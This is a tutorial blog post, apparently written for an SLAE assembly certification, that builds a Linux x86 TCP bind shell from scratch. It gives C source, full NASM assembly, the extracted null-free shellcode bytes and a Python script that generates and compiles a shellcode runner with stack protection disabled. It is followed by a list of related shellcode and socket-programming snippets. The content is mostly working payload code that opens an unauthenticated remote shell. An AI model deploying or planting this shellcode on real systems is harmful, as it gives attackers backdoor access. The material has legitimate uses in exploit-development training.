Linux TCP Bind Shell from Scratch with Intel x86 Assembly
|
|
- Barnaby Blake
- 6 years ago
- Views:
Transcription
1 Linux TCP Bind Shell from Scratch with Intel x86 Assembly Amonsec Jun 13, 2017 (V 1.0) 1 1 7
2 This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: Student ID: SLAE-975 Assignment number: #1 Github repository: Table of Contents What is a TCP bind shell?...3 Syscalls & socket functions...5 From C to Assembly...7 Create a socket... 7 Bind our socket... 8 Listening... 9 Accept an incoming connection... 9 Duplicate our File Descriptor Execute the shell Assembling pieces Optimization
3 Introduction The aim of this post is to create from scratch a Linux TCP bind shell with Intel x86 Assembly instead of using Metasploit. It s always a good thing to create his own shellcode because: You know what you are using You have a small custom shellcode It s fun What you need in order to reproduce the process: A Linux x86 system (Kali Linux in my case) Your brain (and maybe a cup a coffee or eight) What is a TCP bind shell? A TCP bind shell is a program that acts like server on a local port, waiting a connection from someone and when someone connect to this local port return a shell. The following C code is an example of a TCP bind shell: #include <sys/socket.h> #include <sys/types.h> #include <unistd.h> #include <stdio.h> int main(void) { int clientfd; int sockfd; int port = 31337; struct sockaddr_in addr; sockfd = socket(af_inet, SOCK_STREAM, 0); addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = INADDR_ANY; bind(sockfd, (struct sockaddr *) &addr, sizeof(addr)); listen(sockfd, 1); clientfd = accept(sockfd, NULL, NULL); dup2(clientfd, 0); dup2(clientfd, 1); dup2(clientfd, 2); } execve("/bin/sh", NULL, NULL); return 0; 3 1 7
4 It s a bit esoteric for you? Let me explain you what this code does. First we create a socket, here called sockfd: sockfd = socket(af_inet, SOCK_STREAM, 0); Then, we initialize our socket in order to bind it later: addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = INADDR_ANY; After that, we bind your socket with the desired port, here 31337: bind(sockfd, (struct sockaddr *) &addr, sizeof(addr)); At this point, we can both listen for an incoming connection and accept the incoming connection. Note, due to the NULL s we don t store data: listen(sockfd, 0); clientfd = accept(sockfd, NULL, NULL); All we need to do now is to duplicate our file descriptor for stdin (0), stdout (1) and stderr (2): dup2(clientfd, 0); dup2(clientfd, 1); dup2(clientfd, 2); Finally, we can execute the /bin/sh command: execve("/bin/sh", NULL, NULL); Let s compile and see if this code works: 4 1 7
5 Sweet Syscalls & socket functions A system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on. This may include hardware-related services (for example, accessing a hard disk drive), creation and execution of new processes, and communication with integral kernel services such as process scheduling. According to the Linux Man page: The system call is the fundamental interface between an application and the Linux kernel. So, which syscalls we need to use in order to create our bind shell? This following command can give us the answer and the location where syscalls are referenced: amonsec@anakin:/$ cat /usr/include/i386-linux-gnu/asm/unistd_32.h grep -E 'socketcall dup2 execve' head -3 #define NR_execve 11 #define NR_dup2 63 #define NR_socketcall 102 amonsec@anakin:/$ Note, we can use this awesome website to find syscall, and much more: Now, we need to find ids of the functions that we want to use with our socket. For that, the Linux NET s header can help us. According to the documentation: NET is an implementation of the SOCKET network access protocol. This is the master header file for the Linux NET layer, or, in plain English: the networking handling part of the kernel. To find functions ids that we want to use we can use this following command: 5 1 7
6 cat /usr/include/linux/net.h [..snip..] #define SYS_SOCKET 1 #define SYS_BIND 2 #define SYS_CONNECT 3 #define SYS_LISTEN 4 #define SYS_ACCEPT 5 #define SYS_GETSOCKNAME 6 #define SYS_GETPEERNAME 7 #define SYS_SOCKETPAIR 8 #define SYS_SEND 9 #define SYS_RECV 10 #define SYS_SENDTO 11 #define SYS_RECVFROM 12 #define SYS_SHUTDOWN 13 #define SYS_SETSOCKOPT 14 #define SYS_GETSOCKOPT 15 #define SYS_SENDMSG 16 #define SYS_RECVMSG 17 #define SYS_ACCEPT4 18 #define SYS_RECVMMSG 19 #define SYS_SENDMMSG 20 [..snip..] Moreover, we need few other things such as, the id of the socket type that we want to use: amonsec@anakin:~$ cat /usr/include/i386-linux-gnu/bits/socket_type.h grep 'SOCK_STREAM' SOCK_STREAM = 1, /* Sequenced, reliable, connection-based #define SOCK_STREAM SOCK_STREAM amonsec@anakin:~$ And the id of the protocol family that we are going to use: amonsec@anakin:~$ cat /usr/include/i386-linux-gnu/bits/socket.h grep 'PF_INET' grep -v 6 #define PF_INET 2 /* IP protocol family. */ #define AF_INET PF_INET amonsec@anakin:~$ We have everything we need! Now let s begin the sorcery! 6 1 7
7 From C to Assembly Create a socket In our context, the EBX register contain the id of the socket function that we want to use and here is 1, for the SOCKET function. Moreover, the id of the socket type is 1 (SOCK_STREAM) and the id of the socket that we want to use is 2 (AF_INET). This following code is used to create our socket: global _start section.text _start: ; Create our socket ; socket(af_inet, SOCK_STREAM, 0) ; xor ebx, ebx ; zeroed EBX mov bl, 0x01 ; #define SYS_SOCKET 1 xor edx, edx xor ecx, ecx ; zeroed EDX ; zeroed ECX ; 0 push ebx ; SOSCK_STREAM push byte 0x02 ; AF_INET = 2 mov ecx, esp ; arguments xor eax, eax ; zeroed EAX mov al, 0x66 ; #define NR_socketcall 102 ; Interrupt xchg esi, eax ; Save addr Note, after the kernel interrupt handler call () we must store the EAX register because he contains our socket file descriptor and we are going to use it later. Schema: 7 1 7
8 Bind our socket Now we have a socket and we can bind it. For that, we first need to create our sokcaddr pointer and it looks like this in C: struct sockaddr_in { short sin_family; // e.g. AF_INET, AF_INET6 unsigned short sin_port; // e.g. htons(3490) struct in_addr sin_addr; // see struct in_addr, below }; With that and the id of this bind socket function, we are good to go. Note, the port that we want to bind is in big indian format. ; Bind our socket ; addr.sin_family = AF_INET; ; addr.sin_port = htons(port); ; addr.sin_addr.s_addr = INADDR_ANY; ; bind(sockfd, (struct sockaddr *) &addr, sizeof(addr)); ; inc ebx ; #define SYS_BIND 2 ; INADDR_ANY push word 0x697A ; Port in big-indian = push bx ; AF_INET mov ecx, esp ; ECX = sockaddr point push byte 0x10 ; sizeof(addr) push ecx ; sockaddr push esi ; sockfd mov ecx, esp ; arguments mov al, 0x66 ; #define NR_socketcall 102 ; Interrupt Schema: 8 1 7
9 Listening Next step is to say to our socket to listening for an incoming connection. ; Listen ; listen(sockfd, 0); ; ; 0 inc ebx ; EBX = EBX + 1 inc ebx ; EBX = EBX + 1 push ebx ; #define SYS_LISTEN 4 push esi ; sockfd mov ecx, esp ; arguments mov al, 0x66 ; #define NR_socketcall 102 ; Interrupt Schema: Accept an incoming connection Ok, we have a socket, we bind it and he is listening for an incoming connection, now we can recreate the accept function in order to allow a connection. ; Accept ; accept(sockfd, NULL, NULL) inc ebx ; #define SYS_ACCEPT 5 push esi mov ecx, esp ; NULL ; NULL ; sockfd ; arguments mov al, 0x66 ; #define NR_socketcall 102 ; Interrupt xchg ebx, eax ; Save clientfd 9 1 7
10 Duplicate our File Descriptor We are soon at the end! At this point we need to duplicate three times our file descriptor in order to have STDIN (0) and STDOUT (1) and STDERR (2). For that we have two possibilities, create or loop or not. The loop version: ; Dup2 ; dup2(clientfd, 0) ; dup2(clientfd, 1) ; dup2(clientfd, 2) xor ecx, ecx ; zeroed ECX dup: mov al, 0x3f ; #define NR_dup2 63 ; Interrupt inc ecx ; ECX = ECX + 1 cmp ecx, 0x3 ; Compare ECX and 3 jne dup ; Jump if not equal The basic version: xor ecx, ecx ; zeroed ECX mov al, 0x3f ; #define NR_dup2 63 ; Interrupt inc ecx ; ECX = ECX + 1 mov al, 0x3f ; #define NR_dup2 63 ; Interrupt inc ecx ; ECX = ECX + 1 mov al, 0x3f ; #define NR_dup2 63 ; Interrupt
11 Schema: Execute the shell Our last step! Now we only need to execute a shell, in our case /bin/sh. The structure of the execve function look like this: int execve( const char *filename, char *const argv[], char *const envp[] ); The EBX register need to contain the binary to execute, /bin/sh in our case and ECX and EDX are not use, so, they must be null. Let s translate this C code into assembler: ; Execve ; execve("/bin/sh", NULL, NULL) ; ; Null terminator push 0x68732f2f ; hs// push 0x6e69622f ; nib/ mov ebx, esp mov ecx, edx ; /bin//sh ; NULL mov al, 0x0b ; #define NR_execve 11 ; Down :)
12 Schema: Note, the null-terminator is used to end the string and to be sure to don t have any other unwanted things in it. Moreover, we must push words in the stack, that s why we push /bin//sh instead of /bin/sh and because the stack is LIFO, we push it in the opposite way. If you want to create opcode from a string you can use one of my python script here: string2opcode.py
13 Assembling pieces global _start section.text _start: ; Create our socket ; socket(af_inet, SOCK_STREAM, 0) ; xor ebx, ebx mov bl, 0x01 xor edx, edx xor ecx, ecx push ebx push byte 0x02 mov ecx, esp xor eax, eax mov al, 0x66 xchg esi, eax ; Bind our socket ; addr.sin_family = AF_INET; ; addr.sin_port = htons(port); ; addr.sin_addr.s_addr = INADDR_ANY; ; bind(sockfd, (struct sockaddr *) &addr, sizeof(addr)); ; inc ebx push word 0x697A push bx mov ecx, esp push byte 0x10 push ecx push esi mov ecx, esp mov al, 0x66 ; Listen ; listen(sockfd, 0); ; inc ebx inc ebx push ebx push esi mov ecx, esp mov al, 0x66 ; Accept ; accept(sockfd, NULL, NULL) inc ebx push esi mov ecx, esp
14 mov al, 0x66 xchg ebx, eax ; Dup2 ; dup2(clientfd, 0) ; dup2(clientfd, 1) ; dup2(clientfd, 2) xor ecx, ecx dup: mov al, 0x3f inc ecx cmp ecx, 0x3 jne dup ; Execve ; execve("/bin/sh", NULL, NULL) ; push 0x68732f2f push 0x6e69622f mov ebx, esp mov ecx, edx mov al, 0x0b Let s compile this code and see if it works. amonsec@anakin:/opt/slae/assignment-1$ nasm -felf32 bind_shell_linux_x86.asm amonsec@anakin:/opt/slae/assignment-1$ ld -melf_i386 bind_shell_linux_x86.o -o bind And it works!
15 Optimization Now, we want to create a simple python script to create a binary with the desired port. First, we need to extract the shellcode: amonsec@anakin:/opt/slae/assignment-1$ objdump -d./bind grep '[0-9a-f]:' grep -v 'file' cut -f2 -d: cut -f1-6 -d' ' tr -s ' ' tr '\t' ' ' sed 's/ $//g' sed 's/ /\\x/g' paste -d '' -s sed 's/^/"/' sed 's/$/"/g' "\x31\xdb\xb3\x01\x31\xd2\x31\xc9\x52\x53\x6a\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x96\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6 a\x10\x51\x56\x89\xe1\xb0\x66\xcd\x80\x52\x43\x43\x53\x56\x89\xe1\xb0\x66\xcd\x80\x43\x52\x52\x56\x89\xe1\xb0\x66\xcd\x80\x93\x3 1\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xd1\xb0\x0b\xcd\x80" amonsec@anakin:/opt$ With the shellcode (without null byte) let s begin our python script: #!/usr/bin/env python import sys import re import os # Colorz RED = "\x1b[1;31m" BLU = "\x1b[1;34m" GRE = "\x1b[1;32m" RST = "\x1b[0;0;0m" # Lambda info_message = lambda x: '{}[*]{} {}'.format(blu, RST, x) suce_message = lambda x: '{}[+]{} {}'.format(gre, RST, x) erro_message = lambda x: '{}[-]{} {}'.format(red, RST, x) # Core print info_message('linux x86 TCP bind shell (v1.0)') print info_message('author {}Amonsec{}\n'.format(RED, RST)) if len(sys.argv) < 2: print info_message('usage: python {} <local port>'.format(sys.argv[0])) sys.exit(0) port = int(sys.argv[1]) if port < 1 or port > : print erro_message('you\'re drunk. Go home. Go home') sys.exit(0) if len(hex(port).split('x')[1]) < 4: port = '0' + hex(port).split('x')[1] else: port = hex(port).split('x')[1] hexchain = '' for x in re.findall('..', port): if x == '00': print erro_message('null byte detected') sys.exit(0) hexchain += '\\x' + x print suce_message('hexchain port: {}'.format(hexchain))
16 shellcode = ( "\\x31\\xdb\\xb3\\x01\\x31\\xd2\\x31\\xc9\\x52\\x53\\x6a" "\\x02\\x89\\xe1\\x31\\xc0\\xb0\\x66\\xcd\\x80\\x96\\x43" "\\x52\\x66\\x68" + hexchain + "\\x66\\x53\\x89\\xe1\\x6a\\x10" "\\x51\\x56\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x52\\x43\\x43" "\\x53\\x56\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x43\\x52\\x52" "\\x56\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x93\\x31\\xc9\\xb0" "\\x3f\\xcd\\x80\\x41\\x83\\xf9\\x03\\x75\\xf6\\x52\\x68" "\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3" "\\x89\\xd1\\xb0\\x0b\\xcd\\x80") print suce_message('your shellcode:\n') print shellcode.format('hex') print '' print info_message('creating the C file...') filename = 'bind_shell_linux_x86.c' content = '' content += '#include <stdio.h>\n' content += '#include <string.h>\n' content += 'unsigned char shellcode[] = \\ \n' content += '"' + shellcode + '";\n' content += 'int main() {\n' content += 'int (*ret)() = (int(*)())shellcode;\n' content += 'ret();\n' content += '}\n' data = open(filename, 'w') data.write(content) data.close() print suce_message('c file successfully created.') print info_message('compiling the C file...') try: os.system('gcc -fno-stack-protector -z execstack bind_shell_linux_x86.c -o bind_shell_linux_x86') except Exception: print erro_message('error with the compilation') sys.exit(1) print suce_message('c file successfully compiled.') print suce_message('you are good to go 1337') print '' sys.exit(0)
17 Amonsec
Web Application Hacking Exploitation Development 104. CIS 5930/4930 Offensive Security Spring 2013
Web Application Hacking 104 + Exploitation Development 104 CIS 5930/4930 Offensive Security Spring 2013 Outline IDS / IPS WAF Defeating IDS / IPS & WAF: connect back shellcode refresher on port binding
More informationThis is an example C code used to try out our codes, there several ways to write this but they works out all the same.
...._ _... _.;_/ [_) (_]\_ [ )(_](_. \.net._ "LINUX SHELLCODING REFERENCE" Author: Nexus Email: nexus.hack@gmail.com Website: http://www.playhack.net Introduction ------------- One of the most important
More informationUniversità Ca Foscari Venezia
Stack Overflow Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Introduction Buffer overflow is due to careless programming in unsafe languages like C
More informationCNIT 127: Exploit Development. Ch 3: Shellcode. Updated
CNIT 127: Exploit Development Ch 3: Shellcode Updated 1-30-17 Topics Protection rings Syscalls Shellcode nasm Assembler ld GNU Linker objdump to see contents of object files strace System Call Tracer Removing
More informationDeveloping StrongARM/Linux shellcode
Into my ARMs Developing StrongARM/Linux shellcode by funkysh 16.12.2001 ----{ Introduction This paper covers informations needed to write StrongARM Linux shellcode. All examples presented
More informationCSC 405 Computer Security Shellcode
CSC 405 Computer Security Shellcode Alexandros Kapravelos akaprav@ncsu.edu Attack plan Attack code Vulnerable code xor ebx, ebx xor eax, eax mov ebx,edi mov eax,edx sub eax,0x388 Vulnerable code xor ebx,
More informationA Socket Example. Haris Andrianakis & Angelos Stavrou George Mason University
A Socket Example & George Mason University Everything is a file descriptor Most socket system calls operate on file descriptors Server - Quick view socket() bind() listen() accept() send(), recv() close()
More informationShellcode. Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona. Tel Fax
Shellcode Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch Content Intel Architecture Memory Layout C Arrays Buffer
More informationCSC209H Lecture 9. Dan Zingaro. March 11, 2015
CSC209H Lecture 9 Dan Zingaro March 11, 2015 Socket Programming (Kerrisk Ch 56, 57, 59) Pipes and signals are only useful for processes communicating on the same machine Sockets are a general interprocess
More informationThe BSD UNIX Socket Interface (CS 640 Lecture) Assignment 1. Interprocess Communication (IPC) Work Individually (no groups)
The BSD UNIX Socket Interface (CS 640 Lecture) Assignment 1 Work Individually (no groups) Due Date: in class, Monday, September 19 Robert T Olsen olsen@cswiscedu 7390CS Office Hours: 3-5T, 11-12F - exception
More informationSockets. Dong-kun Shin Embedded Software Laboratory Sungkyunkwan University Embedded Software Lab.
1 Sockets Dong-kun Shin Embedded Software Laboratory Sungkyunkwan University http://nyx.skku.ac.kr Internet Connections (1) 2 Connection Clients and servers communicate by sending streams of bytes over
More informationSandwiches for everyone
Inf2C :: Computer Systems Today s menu ( And finally, monsieur, a wafer-thin mint ) Notes on security Or, why safety is an illusion, why ignorance is bliss, and why knowledge is power Stack overflows Or,
More informationUnix Network Programming
Introduction to Computer Networks Polly Huang EE NTU Unix Network Programming The socket struct and data handling System calls Based on Beej's Guide to Network Programming 1 The Unix Socket A file descriptor
More informationHyo-bong Son Computer Systems Laboratory Sungkyunkwan University
Sockets Hyo-bong Son (proshb@csl.skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu Client-Server Model Most network application is based on the client-server model: A server
More informationECE 435 Network Engineering Lecture 2
ECE 435 Network Engineering Lecture 2 Vince Weaver http://web.eece.maine.edu/~vweaver vincent.weaver@maine.edu 6 September 2018 Announcements Homework 1 will be posted. Will be on website, will announce
More informationSocket Programming TCP UDP
Socket Programming TCP UDP Introduction Computer Network hosts, routers, communication channels Hosts run applications Routers forward information Packets: sequence of bytes contain control information
More informationCS321: Computer Networks Socket Programming
CS321: Computer Networks Socket Programming Dr. Manas Khatua Assistant Professor Dept. of CSE IIT Jodhpur E-mail: manaskhatua@iitj.ac.in Socket Programming It shows how the network application programs
More informationSocket Programming. CSIS0234A Computer and Communication Networks. Socket Programming in C
1 CSIS0234A Computer and Communication Networks Socket Programming in C References Beej's Guide to Network Programming Official homepage: http://beej.us/guide/bgnet/ Local mirror http://www.cs.hku.hk/~c0234a/bgnet/
More informationSockets. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University
Sockets Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu Internet Connections (1) Connection Clients and servers communicate by sending streams of
More informationProgramming with TCP/IP. Ram Dantu
1 Programming with TCP/IP Ram Dantu 2 Client Server Computing Although the Internet provides a basic communication service, the protocol software cannot initiate contact with, or accept contact from, a
More informationECE 435 Network Engineering Lecture 2
ECE 435 Network Engineering Lecture 2 Vince Weaver http://web.eece.maine.edu/~vweaver vincent.weaver@maine.edu 31 August 2017 Announcements Homework 1 will be posted. Will be on website, will announce
More informationComputer Architecture and Assembly Language. Practical Session 5
Computer Architecture and Assembly Language Practical Session 5 Addressing Mode - "memory address calculation mode" An addressing mode specifies how to calculate the effective memory address of an operand.
More informationTutorial on Socket Programming
Tutorial on Socket Programming Computer Networks - CSC 458 Department of Computer Science Hao Wang (Slides are mainly from Seyed Hossein Mortazavi, Monia Ghobadi, and Amin Tootoonchian, ) 1 Outline Client-server
More informationNetwork Programming in C. Networked Systems 3 Laboratory Sessions and Problem Sets
Network Programming in C Networked Systems 3 Laboratory Sessions and Problem Sets Lab Timetable, Aims, and Objectives Teaching Week Activity 14 Introduction 15 Warm-up exercise 16 17 Web client 18 19 20
More informationNetwork Programming in C: The Berkeley Sockets API. Networked Systems 3 Laboratory Sessions
Network Programming in C: The Berkeley Sockets API Networked Systems 3 Laboratory Sessions The Berkeley Sockets API Widely used low-level C networking API First introduced in 4.3BSD Unix Now available
More informationCS 499 Lab 3: Disassembly of slammer.bin I. PURPOSE
CS 499 Lab 3: Disassembly of slammer.bin I. PURPOSE The purpose of this exercise is to learn Intel assembly language by disassembling a small piece of code and extensively commenting the resulting instructions.
More informationShell Code For Beginners
Shell Code For Beginners Beenu Arora Site: www.beenuarora.com Email: beenudel1986@gmail.com ################################################################ #.. # # _/ \ _ \ _/ # # / \ \\ \ / // \/ /_\
More informationThe Geometry of Innocent Flesh on the Bone
The Geometry of Innocent Flesh on the Bone Return-into-libc without Function Calls (on the x86) Hovav Shacham hovav@cs.ucsd.edu CCS 07 Technical Background Gadget: a short instructions sequence (e.x. pop
More informationPA #2 Reviews. set_name, get_name, del_name. Questions? Will be modified after PA #4 ~
Sockets Prof. Jin-Soo Kim( jinsookim@skku.edu) TA Dong-Yun Lee(dylee@csl.skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu PA #2 Reviews set_name, get_name, del_name Will
More informationClient-server model The course that gives CMU its Zip! Network programming Nov 27, Using ports to identify services.
15-213 The course that gives CMU its Zip! Network programming Nov 27, 2001 Topics Client- model Sockets interface Echo and Client- model Every network application is based on the - model: Application is
More informationIs stack overflow still a problem?
Morris Worm (1998) Code Red (2001) Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 31st January 2017 Memory corruption Buffer overflow remains
More informationSystem calls and assembler
System calls and assembler Michal Sojka sojkam1@fel.cvut.cz ČVUT, FEL License: CC-BY-SA 4.0 System calls (repetition from lectures) A way for normal applications to invoke operating system (OS) kernel's
More informationCLIENT-SIDE PROGRAMMING
CLIENT-SIDE PROGRAMMING George Porter Apr 11, 2018 ATTRIBUTION These slides are released under an Attribution-NonCommercial-ShareAlike 3.0 Unported (CC BY-NC-SA 3.0) Creative Commons license These slides
More informationApplication Programming Interfaces
Application Programming Interfaces Stefan D. Bruda Winter 2018 SYSTEM CALLS Machine 1 Machine 2 Application 1 Application 3 Application 4 Application 5 Application 2 API (system functions) API (system
More informationCSE 333 SECTION 8. Sockets, Network Programming
CSE 333 SECTION 8 Sockets, Network Programming Overview Domain Name Service (DNS) Client side network programming steps and calls Server side network programming steps and calls dig and ncat tools Network
More informationBuffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.
Outline Morris Worm (1998) Infamous attacks Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 23rd January 2014 Recap Simple overflow exploit
More informationNetwork Programming Worksheet 2. Simple TCP Clients and Servers on *nix with C.
Simple TCP Clients and Servers on *nix with C. Aims. This worksheet introduces a simple client and a simple server to experiment with a daytime service. It shows how telnet can be used to test the server.
More informationNETWORK PROGRAMMING. Instructor: Junaid Tariq, Lecturer, Department of Computer Science
NETWORK PROGRAMMING CSC- 341 25 Instructor: Junaid Tariq, Lecturer, Department of Computer Science 26 9 Lecture Sockets as means for inter-process communication (IPC) application layer Client Process Socket
More informationThe Berkeley Sockets API. Networked Systems Architecture 3 Lecture 4
The Berkeley Sockets API Networked Systems Architecture 3 Lecture 4 The Berkeley Sockets API Widely used low-level C networking API First introduced in 4.3BSD Unix Now available on most platforms: Linux,
More informationSOEN228, Winter Revision 1.2 Date: October 25,
SOEN228, Winter 2003 Revision 1.2 Date: October 25, 2003 1 Contents Flags Mnemonics Basic I/O Exercises Overview of sample programs 2 Flag Register The flag register stores the condition flags that retain
More informationCS307 Operating Systems Processes
CS307 Processes Fan Wu Department of Computer Science and Engineering Shanghai Jiao Tong University Spring 2018 Process Concept Process a program in execution An operating system executes a variety of
More informationProcesses. Process Concept. The Process. The Process (Cont.) Process Control Block (PCB) Process State
CS307 Process Concept Process a program in execution Processes An operating system executes a variety of programs: Batch system jobs Time-shared systems user programs or tasks All these activities are
More informationSocket Programming. Dr. -Ing. Abdalkarim Awad. Informatik 7 Rechnernetze und Kommunikationssysteme
Socket Programming Dr. -Ing. Abdalkarim Awad Informatik 7 Rechnernetze und Kommunikationssysteme Before we start Can you find the ip address of an interface? Can you find the mac address of an interface?
More informationShellcoding 101. by datagram LayerOne char shellcode[]=
char shellcode[]= \x31\xdb \xf7\xe3 \x66\x68 \x21\x0a \x68\x64 \x65\x65 \x73\x68\x74\x74\x65\x6e \x68\x6e\x65\x20\x41\x68 \x79\x65\x72\x4f\x68\x6f \x20\x4c\x61\x68\x48\x65 \x6c\x6c\xb0\x04\x43\x89 \xe1\xb2
More informationTCP: Three-way handshake
Sockets in C 1 Sockets in C The slides by themselves will not be sufficient to learn how to write socket code. If you did not attend class, then you will want to review the relevant chapters in Kerrisk
More informationLecture 7. Followup. Review. Communication Interface. Socket Communication. Client-Server Model. Socket Programming January 28, 2005
Followup symbolic link (soft link): pathname, can be across file systems, replacement of file will be active on all symbolic links, consumes at least an inode. hard link: pointers to an inode, only in
More informationPractical Malware Analysis
Practical Malware Analysis Ch 4: A Crash Course in x86 Disassembly Revised 1-16-7 Basic Techniques Basic static analysis Looks at malware from the outside Basic dynamic analysis Only shows you how the
More informationCS118 Discussion 1B, Week 1. Taqi Raza BUNCHE 1209B, Fridays 12:00pm to 1:50pm
CS118 Discussion 1B, Week 1 Taqi Raza BUNCHE 1209B, Fridays 12:00pm to 1:50pm 1 TA Taqi, PhD student in Computer Networking Discussion (1B): Bunche 1209, Fri 12:00 1:50 p.m. Office hours: Boelter Hall
More informationProject 3. Reliable Data Transfer over UDP. NTU CSIE Computer Networks 2011 Spring
Project 3 Reliable Data Transfer over UDP NTU CSIE Computer Networks 2011 Spring Project Goal In Project 3, students are asked to understand and implement reliable data transfer mechanism over UDP. UDP
More informationCS321: Computer Networks Introduction to Application Layer
CS321: Computer Networks Introduction to Application Layer Dr. Manas Khatua Assistant Professor Dept. of CSE IIT Jodhpur E-mail: manaskhatua@iitj.ac.in Basic Application layer provides services to the
More informationCSE 333 SECTION 7. Client-Side Network Programming
CSE 333 SECTION 7 Client-Side Network Programming Overview Domain Name Service (DNS) Client side network programming steps and calls dig and ncat tools Network programming for the client side Recall the
More informationCPS104 Recitation: Assembly Programming
CPS104 Recitation: Assembly Programming Alexandru Duțu 1 Facts OS kernel and embedded software engineers use assembly for some parts of their code some OSes had their entire GUIs written in assembly in
More information15-213/ Final Exam Notes Sheet Spring 2013!
Jumps 15-213/18-213 Final Exam Notes Sheet Spring 2013 Arithmetic Operations Jump Condi+on jmp 1 je ZF jne ~ZF js SF jns ~SF jg ~(SF^OF)&~ZF jge ~(SF^OF) jl (SF^OF) jle (SF^OF) ZF ja ~CF&~ZF jb CF Format
More informationSockets. Dong-kun Shin Embedded Software Laboratory Sungkyunkwan University Embedded Software Lab.
1 Sockets Dong-kun Shin Embedded Software Laboratory Sungkyunkwan University http://nyx.skku.ac.kr Echo Client (1) 2 #include #include #include #include
More informationElementary TCP Sockets
Elementary TCP Sockets Chapter 4 UNIX Network Programming Vol. 1, Second Ed. Stevens Distributed Computer Systems 1 socket interface Application 1 Application 2 socket interface user kernel user kernel
More informationPorts under 1024 are often considered special, and usually require special OS privileges to use.
1 2 Turns out that besides an IP address (used by the IP layer), there is another address that is used by TCP (stream sockets) and, coincidentally, by UDP (datagram sockets). It is the port number. It's
More informationReverse Engineering II: Basics. Gergely Erdélyi Senior Antivirus Researcher
Reverse Engineering II: Basics Gergely Erdélyi Senior Antivirus Researcher Agenda Very basics Intel x86 crash course Basics of C Binary Numbers Binary Numbers 1 Binary Numbers 1 0 1 1 Binary Numbers 1
More informationCSE 333 SECTION 7. C++ Virtual Functions and Client-Side Network Programming
CSE 333 SECTION 7 C++ Virtual Functions and Client-Side Network Programming Overview Virtual functions summary and worksheet Domain Name Service (DNS) Client side network programming steps and calls dig
More informationReverse Engineering II: The Basics
Reverse Engineering II: The Basics Gergely Erdélyi Senior Manager, Anti-malware Research Protecting the irreplaceable f-secure.com Binary Numbers 1 0 1 1 - Nibble B 1 0 1 1 1 1 0 1 - Byte B D 1 0 1 1 1
More informationICT 6544 Distributed Systems Lecture 5
ICT 6544 Distributed Systems Lecture 5 Hossen Asiful Mustafa Message Brokers Figure 4-21. The general organization of a message broker in a message-queuing system. IBM s WebSphere Message-Queuing System
More informationCSE 333 Lecture 16 - network programming intro
CSE 333 Lecture 16 - network programming intro Hal Perkins Department of Computer Science & Engineering University of Washington Today Network programming - dive into the Berkeley / POSIX sockets API -
More informationA Client-Server Exchange
Socket programming A Client-Server Exchange A server process and one or more client processes Server manages some resource. Server provides service by manipulating resource for clients. 1. Client sends
More informationsottotitolo Socket Programming Milano, XX mese 20XX A.A. 2016/17 Federico Reghenzani
Titolo presentazione Piattaforme Software per la Rete sottotitolo Socket Programming Milano, XX mese 20XX A.A. 2016/17 Outline 1) Introduction to Sockets 2) UDP communication 3) TCP communication 4) RAW
More informationHow to write a Measurement Telnet Server
How to write a Measurement Telnet Server A measurement Telnet server allows you to access remote I/Os with a standard Telnet client program. The following samples shows a way to set the LEDs of a DNP/EVA1
More information3. Process Management in xv6
Lecture Notes for CS347: Operating Systems Mythili Vutukuru, Department of Computer Science and Engineering, IIT Bombay 3. Process Management in xv6 We begin understanding xv6 process management by looking
More informationCSE 124 Discussion Section Sockets Programming 10/10/17
CSE 124 Discussion Section Sockets Programming 10/10/17 Topics What s a socket? Creating a socket Connecting a socket Sending data Receiving data Resolving URLs to IPs Advanced socket options Live code
More informationCS 640: Computer Networking
CS 640: Computer Networking Yu-Chi Lai Lecture 3 Network Programming Topics Client-server model Sockets interface Socket primitives Example code for echoclient and echoserver Debugging With GDB Programming
More informationDefending Computer Networks Lecture 2: Vulnerabili0es. Stuart Staniford Adjunct Professor of Computer Science
Defending Computer Networks Lecture 2: Vulnerabili0es Stuart Staniford Adjunct Professor of Computer Science Logis;cs S;ll space in class Restric;on to CS M.Eng will be libed shortly HW1 probably given
More informationDefending Computer Networks Lecture 2: Vulnerabili0es. Stuart Staniford Adjunct Professor of Computer Science
Defending Computer Networks Lecture 2: Vulnerabili0es Stuart Staniford Adjunct Professor of Computer Science Logis;cs S;ll space in class 73 out of 75 taken on Tuesday Will be drop- outs Restric;on to
More informationCS 3516: Computer Networks
Welcome to CS 3516: Prof. Yanhua Li Time: 9:00am 9:50am M, T, R, and F Location: AK219 Fall 2018 A-term 1 Some slides are originally from the course materials of the textbook Computer Networking: A Top
More informationX86 Addressing Modes Chapter 3" Review: Instructions to Recognize"
X86 Addressing Modes Chapter 3" Review: Instructions to Recognize" 1 Arithmetic Instructions (1)! Two Operand Instructions" ADD Dest, Src Dest = Dest + Src SUB Dest, Src Dest = Dest - Src MUL Dest, Src
More informationProgram Exploitation Intro
Program Exploitation Intro x86 Assembly 04//2018 Security 1 Univeristà Ca Foscari, Venezia What is Program Exploitation "Making a program do something unexpected and not planned" The right bugs can be
